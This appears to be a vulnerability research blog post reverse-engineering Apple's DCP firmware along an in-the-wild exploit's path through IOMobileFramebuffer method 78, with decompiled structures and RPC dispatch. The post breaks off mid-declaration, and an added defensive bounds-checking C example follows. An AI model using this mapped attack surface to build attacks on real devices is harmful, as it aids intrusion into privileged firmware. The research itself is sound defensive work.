We can see in this M1 die shot from [Tech Insights](<https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1>) that the CPU cores in the middle and right hand side take up only around 10% of the die:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjtJjSN0qdOa1cKBG72s9uuwcVKU5evSg9CiIPtpbbFox0fGgW7XZQU1Jj4IezjIdHC23sJbnklT6acyTFiqB-0-qmcj35Gq-ZZyTHP0DcfFkBztA0DL2P3lhYy2n0k8wgzmzaYX8IMeKosr4uuWMXT-wplsuJQmfR4LDgFzWAUZARvx5rfWjWiusz/s1116/Screenshot%202022-06-22%20at%2016.53.12.png>)\n\nM1 die-shot from techinsights.com with possible location of DCP added\n\n<https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1>\n\n \n\n\nCompanies like [SystemPlus](<https://www.systemplus.fr/>) perform [very thorough analysis of these dies](<https://www.systemplus.fr/wp-content/uploads/2020/12/SP20608-Apple-M1-System-on-Chip-Sample.pdf>). Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.\n\n \n\n\nWith just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.\n\n## My kingdom for a .dSYM!\n\nThe first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. 
The DCP firmware is this file:\n\n* * *\n\n \n\n\nFirmware/dcp/iphone13dcp.im4p\n\n \n\n\nThe im4p in this case is just a 25 byte header which we can discard:\n\n \n\n\n$ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1\n\n$ file iphone13dcp\n\niphone13dcp: Mach-O 64-bit preload executable arm64\n\n \n\n\nIt's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:\n\n \n\n\n$ nm -a iphone13dcp\n\niphone13dcp: no symbols\n\n \n\n\nFunction names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image (\"M3_CA_ResponseLUT read: 0x%08x\" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.\n\n \n\n\nSince the firmware images are distributed as .zip files and Apple's servers support range requests with a bit of python and the [partialzip](<https://github.com/marcograss/partialzip>) tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.\n\n \n\n\nGuess we'll have to do this the hard way!\n\n## Day 1; Instruction 1\n\n$ otool -h raw_fw/iphone13dcp\n\nraw_fw/iphone13dcp:\n\nMach header\n\nmagic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n\n0xfeedfacf 0x100000C 0 0x00 5 5 2240 0x00000001\n\n \n\n\nThat cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.\n\n \n\n\nWith any brand new binary I usually start with a brief look through the function names and the strings. 
The binary is stripped so there are no function name symbols, but there are plenty of C++ function names as strings:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY8rBSaTDR2W5pSgk9ssaCqN8M8Nuhd5_x6FkNSqOI-jRDFVab_jrrkZlN1DS2FKf9zeAPPDFkE30kNCPpN3PES9RdvBLj4L6G78zq134bTQcR1VEe7J30tYPoqqZ82z1cPwUcvF2wzfoOEbDf3l_4ucxpuOZFC2NLyrMYV_luJ_5dysxanajqsi-N/s1830/Screenshot%202022-06-22%20at%2016.53.26.png>)

The cross-references to those strings look like this:

```c
log(0x40000001LL,
    "UPBlock_ALSS.cpp",
    341,
    "%s: capture buffer exhausted, aborting capture\n",
    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");
```

This is almost certainly a logging macro which expands `__FILE__`, `__LINE__` and `__PRETTY_FUNCTION__`. This allows us to start renaming functions and finding vtable pointers.

## Object structure

From the Asahi Linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit, for which there is very little public information. There are some strings in the binary with the exact version:

```asm
ADD X8, X8, #aLocalIphone13d@PAGEOFF ; "local-iphone13dcp.release"
ADD X9, X9, #aRtkitIos182640@PAGEOFF ; "RTKit_iOS-1826.40.9.debug"
```

The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:

```c
struct __cppobj RTKIT_RC_RTTI_BASE
{
  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;
  uint32_t refcnt;
  uint32_t typeid;
};
```

(These structure definitions are in the format IDA uses for C++-like objects.)

The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field: a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them).

The base type has the following associated vtable:

```c
struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl
{
  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);
  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);
  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);
  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);
  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);
  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);
  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);
};
```

## Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application-processor side of IOMobileFrameBuffer and AppleCLCD2 the DCP version.

The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.

The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:

```c
IOReturn
IOMobileFramebufferUserClient::s_set_block(
  IOMobileFramebufferUserClient *this,
  void *reference,
  IOExternalMethodArguments *args)
{
  const unsigned __int64 *extra_args;
  u8 *structureInput;
  structureInput = args->structureInput;
  if ( structureInput && args->scalarInputCount >= 2 )
  {
    if ( args->scalarInputCount == 2 )
      extra_args = 0LL;
    else
      extra_args = args->scalarInput + 2;
    return this->framebuffer_ap->set_block_dcp(
             this->task,
             args->scalarInput[0],
             args->scalarInput[1],
             extra_args,
             args->scalarInputCount - 2,
             structureInput,
             args->structureInputSize);
  } else {
    return 0xE00002C2;
  }
}
```

This unpacks the IOConnectCallMethod arguments and passes them to:

```c
IOMobileFramebufferAP::set_block_dcp(
  IOMobileFramebufferAP *this,
  task *task,
  int first_scalar_input,
  int second_scalar_input,
  const unsigned __int64 *pointer_to_remaining_scalar_inputs,
  unsigned int scalar_input_count_minus_2,
  const unsigned __int8 *struct_input,
  unsigned __int64 struct_input_size)
```

This method uses some autogenerated code to serialise the external method arguments into a buffer like this:

```
arg_struct:
{
  struct task* task
  u64 scalar_input_0
  u64 scalar_input_1
  u64[] remaining_scalar_inputs
  u64 cntExtraScalars
  u8[] structInput
  u64 CntStructInput
}
```

which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):

```c
UnifiedPipeline2::rpc(
  'A435',
  arg_struct,
  0x105Cu,
  &retval_buf,
  4u);
```

UnifiedPipeline2::rpc calls DCPLink::rpc, which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.

AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there, then signal to the DCP that a message is available.

Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP, and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.

## Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called rpc_callee_gated; quite likely that's the receive side of the function rpc_caller_gated we saw earlier.

rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:

```c
switch ( rpc_id )
{
  case 'A000':
    goto LABEL_146;
  case 'A001':
    handler_fptr = callback_handler_A001;
    break;
  case 'A002':
    handler_fptr = callback_handler_A002;
    break;
  case 'A003':
    handler_fptr = callback_handler_A003;
    break;
  case 'A004':
    handler_fptr = callback_handler_A004;
    break;
  case 'A005':
    handler_fptr = callback_handler_A005;
    break;
```

At the bottom of this switch statement is the invocation of the callback handler:

```c
ret = handler_fptr(
        meta,
        in_struct_ptr,
        in_struct_size,
        out_struct_ptr,
        out_struct_size);
```

in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialised earlier on the application processor:

```
arg_struct:
{
  struct task* task
  u64 scalar_input_0
  u64 scalar_input_1
  u64[] remaining_scalar_inputs
  u32 cntExtraScalars
  u8[] structInput
  u64 cntStructInput
}
```

The callback unpacks that buffer and calls a C++ virtual function:

```c
unsigned int
callback_handler_A435(
  u8* meta,
  void *args,
  uint32_t args_size,
  void *out_struct_ptr,
  uint32_t out_struct_size)
{
  int64 instance_id;
  uint64_t instance;
  int err;
  int retval;
  unsigned int result;
  instance_id = meta->instance_id;
  instance =
    global_instance_table[instance_id].IOMobileFramebufferType;
  if ( !instance ) {
    log_fatal(
      "IOMFB: %s: no instance for instance ID: %u\n",
      "static T *IOMFB::InstanceTracker::instance"
      "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"
      " [T = IOMobileFramebuffer]",
      instance_id);
  }
  err = (instance-16)->vtable_0x378( // virtual call
          (instance-16),
          args->task,
          args->scalar_input_0,
          args->scalar_input_1,
          args->remaining_scalar_inputs,
          args->cntExtraScalars,
          args->structInput,
          args->cntStructInput);
  retval = convert_error(err);
  result = 0;
  *(_DWORD *)out_struct_ptr = retval;
  return result;
}
```

The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint, and whilst emulating the firmware is probably possible, that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large, so just go through all those vtables, decompile them and see if the prototypes look reasonable!

There's one clear match in the vtable for the UNPI type:

```c
UNPI::set_block(
  UNPI* this,
  struct task* caller_task_ptr,
  unsigned int first_scalar_input,
  int second_scalar_input,
  int *remaining_scalar_inputs,
  uint32_t cnt_remaining_scalar_inputs,
  uint8_t *structure_input_buffer,
  uint64_t structure_input_size)
```

Here's my reversed implementation of UNPI::set_block:

```c
UNPI::set_block(
  UNPI* this,
  struct task* caller_task_ptr,
  unsigned int first_scalar_input,
  int second_scalar_input,
  int *remaining_scalar_inputs,
  uint32_t cnt_remaining_scalar_inputs,
  uint8_t *structure_input_buffer,
  uint64_t structure_input_size)
{
  struct block_handler_holder *holder;
  struct metadispatcher metadisp;
  if ( second_scalar_input )
    return 0x80000001LL;
  holder = this->UPPipeDCP_H13P->block_handler_holders;
  if ( !holder )
    return 0x8000000BLL;
  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;
  metadisp.handlers_holder = holder;
  metadisp.structure_input_buffer = structure_input_buffer;
  metadisp.structure_input_size = structure_input_size;
  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;
  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;
  metadisp.some_flags = 0x40000000LL;
  metadisp.dispatcher_fptr = a_dispatcher;
  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;
  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);
}
```

This method wraps up the arguments into another structure I've called metadispatcher:

```c
struct __attribute__((aligned(8))) metadispatcher
{
  uint64_t address_of_some_zerofill_static_buffer;
  uint64_t some_flags;
  __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);
  uint64_t offset_of_something_which_looks_serialization_related;
  struct block_handler_holder *handlers_holder;
  uint64_t structure_input_buffer;
  uint64_t structure_input_size;
  uint64_t remaining_scalar_inputs;
  uint32_t cnt_remaining_sclar_input;
};
```

That metadispatcher object is then passed to this method:

```c
return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);
```

In there we reach this code:

```c
block_type_handler = lookup_a_handler_for_block_type_and_subtype(
                       a1,
                       first_scalar_input, // block_type
                       a3);                // subtype
```

The exploit calls this set_block external method twice, passing two different values for first_scalar_input: 7 and 19.
Those correspond to looking up two different block handler objects.

The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:

```c
add_handler_for_block_type(struct block_handler_holder *handler_list,
                           struct BlockHandler *handler)
```

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:

```c
struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE
{
  uint64_t field_16;
  struct handler_inner_types_entry *inner_types_array;
  uint32_t n_inner_types_array_entries;
  uint32_t field_36;
  uint8_t can_run_without_commandgate;
  uint32_t block_type;
  uint64_t list_link;
  uint64_t list_other_link;
  uint32_t some_other_type_field;
  uint32_t some_other_type_field2;
  uint32_t expected_structure_io_size;
  uint32_t field_76;
  uint64_t getBlock_Impl;
  uint64_t setBlock_Impl;
  uint64_t field_96;
  uint64_t back_ptr_to_UPPipeDCP_H13P;
};
```

The RTTI type is BLHA (BLock HAndler).

For example, here's the codepath which builds and registers block handler type 24:

```c
BLHA_24 = (struct BlockHandler *)CXXnew(112LL);
BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;
BLHA_24->block_type = 24;
BLHA_24->refcnt = 1;
BLHA_24->can_run_without_commandgate = 0;
BLHA_24->some_other_type_field = 0LL;
BLHA_24->expected_structure_io_size = 0xD20;
typeid = typeid_BLHA();
BLHA_24->typeid = typeid;
modify_typeid_ref(typeid, 1);
BLHA_24->__vftable = vtable_BLHA_subclass_type_24;
BLHA_24->inner_types_array = 0LL;
BLHA_24->n_inner_types_array_entries = 0;
BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;
BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;
BLHA_24->field_96 = 0LL;
BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;
add_handler_for_block_type(list_holder, BLHA_24);
```

Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual getting and setting operations.

We can go through all the callsites which add block handlers, tell IDA the type of the arguments and name all the getBlock and setBlock implementations:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-Z34Qgm9fUE2rzMwJWQ3j-w7InvtfHj5fs2qctSh0tTFmMbUpnrsQC4rUrhMf3_83uHAFinlM6xKqKXgUc2QR5IfL0gf4YEBM9Rqgrc6sNYsaCZ-JAe0PHlGa9VYcBgWfTqj5rTtin1mWTDG-I8K5M41EhA64KLNV54Sv9lvtbYIrkY2j37X6SniB/s1436/Screenshot%202022-06-22%20at%2016.53.47.png>)

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.

There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

## Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input.
The first dword in the structure input is the id of this subtype. In this case, for block handler type 19, the metadata array has a single entry:

```
<2, 0, 0x5F8, 0x600>
```

The first value (2) is the subtype id, and 0x5f8 and 0x600 tell the DCP at which offsets in the structure input data to read a pointer and a size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:

```c
return wrap_MemoryDescriptor::withAddressRange(
         *(void*)(structure_input_buffer + addr_offset),
         *(unsigned int *)(structure_input_buffer + size_offset),
         caller_task_ptr);
```

We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP so that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:

```c
make_link_call('D453', &req, 0x20, &resp, 0x14);
```

which corresponds to a call to this method on the AP side:

```c
IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)
```

The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size, and passes them via a few final levels of indirection to the block handler:

```c
a_descriptor_with_controlled_stuff->dispatcher_fptr(
  a_descriptor_with_controlled_stuff,
  block_type_handler,
  important_ptr,
  important_size);
```

where the dispatcher_fptr looks like this:

```c
a_dispatcher(
  struct metadispatcher *disp,
  struct BlockHandler *block_handler,
  __int64 controlled_ptr,
  unsigned int controlled_size)
{
  return block_handler->BlockHandler_setBlock(
           block_handler,
           disp->structure_input_buffer,
           disp->structure_input_size,
           disp->remaining_scalar_inputs,
           disp->cnt_remaining_sclar_input,
           disp->handlers_holder->gate,
           controlled_ptr,
           controlled_size);
}
```

You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.

BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:

```c
BlockHandler19::setBlock(
  struct BlockHandler *this,
  void *structure_input_buffer,
  int64 structure_input_size,
  int64 *remaining_scalar_inputs,
  unsigned int cnt_remaining_scalar_inputs,
  struct CommandGate *gate,
  void* mapped_mdesc_ptr,
  unsigned int mapped_mdesc_length)
```

This uses a Command Gate (GATI) object (like a command gate in IOKit, used to serialise calls) to finally get close to actually calling the setBlock_Impl function.

We need to reverse the gate_context structure to follow the controlled data through the gate:

```c
struct __attribute__((aligned(8))) gate_context
{
  struct BlockHandler *the_target_this;
  uint64_t structure_input_buffer;
  void *remaining_scalar_inputs;
  uint32_t cnt_remaining_scalar_inputs;
  uin
```
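The subtype lookup in the Memory Mapping section is the point where a caller-chosen pointer and length leave the structure input and become a memory mapping, so it is worth seeing what a careful implementation has to check there. The following is an added example written for this post, not code from the post or from the DCP firmware: it models a block handler's subtype metadata as `<subtype_id, reserved, addr_offset, size_offset>`, looks up the entry named by the first dword of the structure input, and only then reads the pointer and size at the given offsets. The struct and function names, the `reserved` field name, and the expected input size of 0x608 for handler 19 are assumptions; the post names `expected_structure_io_size` but does not show where it is enforced, so enforcing it here is a design choice of the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not firmware code. One entry of a block handler's
 * inner_types_array as the post describes it: <subtype_id, ?, addr_offset, size_offset>.
 * The second field's meaning is not given in the post; 'reserved' is an assumption. */
struct subtype_entry {
    uint32_t subtype_id;   /* first dword of the structure input selects this entry */
    uint32_t reserved;
    uint32_t addr_offset;  /* offset in the structure input of the u64 userspace pointer */
    uint32_t size_offset;  /* offset in the structure input of the u32 mapping length */
};

struct block_handler_model {
    uint32_t block_type;
    uint32_t expected_structure_io_size;   /* field named in the post's BlockHandler struct */
    const struct subtype_entry *inner_types_array;
    uint32_t n_inner_types_array_entries;
};

struct mapping_request {       /* what would be handed to withAddressRange() on the AP */
    uint64_t user_addr;
    uint32_t length;
};

enum resolve_status {
    RESOLVE_OK = 0,
    RESOLVE_BAD_SIZE,          /* structure input size != handler's expected size */
    RESOLVE_UNKNOWN_SUBTYPE,   /* first dword matches no entry in inner_types_array */
    RESOLVE_OFFSET_OOB,        /* metadata offsets would read past the structure input */
    RESOLVE_ZERO_LENGTH        /* nothing to map */
};

/* Resolve the (pointer, length) pair for the subtype the caller selected. Every
 * read is bounded by structure_input_size, so neither an undersized input nor a
 * bad metadata entry can read beyond the buffer. 'out' may be NULL. */
enum resolve_status resolve_subtype_input(const struct block_handler_model *h,
                                          const uint8_t *structure_input,
                                          uint64_t structure_input_size,
                                          struct mapping_request *out)
{
    uint32_t subtype_id, length;
    uint64_t user_addr;
    const struct subtype_entry *e = NULL;

    if (structure_input_size != h->expected_structure_io_size)
        return RESOLVE_BAD_SIZE;
    if (structure_input_size < sizeof subtype_id)
        return RESOLVE_OFFSET_OOB;
    memcpy(&subtype_id, structure_input, sizeof subtype_id);

    for (uint32_t i = 0; i < h->n_inner_types_array_entries; i++)
        if (h->inner_types_array[i].subtype_id == subtype_id) { e = &h->inner_types_array[i]; break; }
    if (e == NULL)
        return RESOLVE_UNKNOWN_SUBTYPE;

    /* 64-bit arithmetic so a large 32-bit offset cannot wrap the comparison. */
    if ((uint64_t)e->addr_offset + sizeof user_addr > structure_input_size ||
        (uint64_t)e->size_offset + sizeof length > structure_input_size)
        return RESOLVE_OFFSET_OOB;

    memcpy(&user_addr, structure_input + e->addr_offset, sizeof user_addr);
    memcpy(&length, structure_input + e->size_offset, sizeof length);
    if (length == 0)
        return RESOLVE_ZERO_LENGTH;
    if (out) { out->user_addr = user_addr; out->length = length; }
    return RESOLVE_OK;
}

/* Block handler 19 with the single entry <2, 0, 0x5F8, 0x600> from the post.
 * SAMPLE_IO_SIZE is constructed; the post gives no expected size for type 19. */
#define SAMPLE_IO_SIZE 0x608u
static const struct subtype_entry blha19_subtypes[] = { { 2, 0, 0x5F8, 0x600 } };
static const struct block_handler_model blha19 = { 19, SAMPLE_IO_SIZE, blha19_subtypes, 1 };

/* Constructed structure input selecting subtype_id, with the pointer and length
 * placed at the metadata offsets. */
static void build_sample_input(uint8_t buf[SAMPLE_IO_SIZE], uint32_t subtype_id,
                               uint64_t user_addr, uint32_t length)
{
    memset(buf, 0, SAMPLE_IO_SIZE);
    memcpy(buf, &subtype_id, sizeof subtype_id);
    memcpy(buf + 0x5F8, &user_addr, sizeof user_addr);
    memcpy(buf + 0x600, &length, sizeof length);
}

enum resolve_status demo_resolve(uint32_t subtype_id, uint64_t user_addr,
                                 uint32_t length, struct mapping_request *out)
{
    uint8_t buf[SAMPLE_IO_SIZE];
    build_sample_input(buf, subtype_id, user_addr, length);
    return resolve_subtype_input(&blha19, buf, SAMPLE_IO_SIZE, out);
}

/* A caller passing fewer bytes than the handler expects must be rejected before
 * any offset is dereferenced. */
enum resolve_status demo_truncated_input(void)
{
    uint8_t buf[SAMPLE_IO_SIZE];
    build_sample_input(buf, 2, 0x100000000ULL, 0x4000);
    return resolve_subtype_input(&blha19, buf, SAMPLE_IO_SIZE - 1, NULL);
}

/* A (hypothetical) handler whose metadata points past the end of its own expected
 * input: the bounds check must refuse it rather than read adjacent memory. */
enum resolve_status demo_oob_entry(void)
{
    static const struct subtype_entry bad[] = { { 2, 0, SAMPLE_IO_SIZE - 4, 0x600 } };
    const struct block_handler_model h = { 99, SAMPLE_IO_SIZE, bad, 1 };
    uint8_t buf[SAMPLE_IO_SIZE];
    build_sample_input(buf, 2, 0x100000000ULL, 0x4000);
    return resolve_subtype_input(&h, buf, SAMPLE_IO_SIZE, NULL);
}

int main(void)
{
    struct mapping_request req = { 0, 0 };
    enum resolve_status st = demo_resolve(2, 0x100000000ULL, 0x4000, &req);
    printf("subtype 2: status=%d addr=0x%llx len=0x%x\n", (int)st,
           (unsigned long long)req.user_addr, req.length);
    printf("unknown subtype: status=%d\n", (int)demo_resolve(7, 0x100000000ULL, 0x4000, NULL));
    printf("truncated input: status=%d\n", (int)demo_truncated_input());
    printf("bad metadata offset: status=%d\n", (int)demo_oob_entry());
    return 0;
}
```

The resolved pair is still only a userspace address and length chosen by the caller; the checks above keep the DCP's own read of the structure input in bounds, while validating the target range itself is the job of the descriptor's prepare and map steps on the AP side.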